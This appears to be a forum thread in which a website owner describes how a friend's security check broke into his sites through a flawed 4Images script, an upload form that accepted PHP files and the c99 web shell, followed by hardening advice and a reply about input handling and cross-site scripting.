I just asked a friend to proform a quick security check on my sites. Within 15 minutes he had passwords to most of my sites.

What had I done so wrong? Firstly I had 4Images script running which is full of exploits, one of which reveals all the user account names on the server.

He then used a dodgy upload form on one of my sites to upload a hacker tool called c99. Because the upload form (now deleted) allowed php uploads somehow he was able to access that php file and use the usernames gained from the 4images script to gain access to any user account on my server.

He could then just open php files using c99 and get passwords. The only secure sites were ones coded by decent programmers who had done techniques such as echoing html instead of php files to produce sites.


This made me think a lot about security, I thought my sites were relativly secure, but in 15 minutes the vast majority of them were compromised.

He suggested:


Having different passwords for databases and user accounts
Having different passwords for every site
Checking all scripts before upload in future for potential to upload php
Not using third party scripts such as 4 images unless known to be secure (VBulletin is considered secure)

Any site that allows user uploaded files needs extra layers of security.

Its a good thing you had a friend who could do that and that you had it done. As I've progressed in PHP and MySQL, security in my code and websites in general have become a real interest. Anywhere a person can enter something that is stored or even displayed (without being stored) can be dangerous. Just look at cross site scripting (XSS) those can be little annoyances to website compromising problems. I've learnt a lot from rsnake's (http://ha.ckers.org) blogs and forum.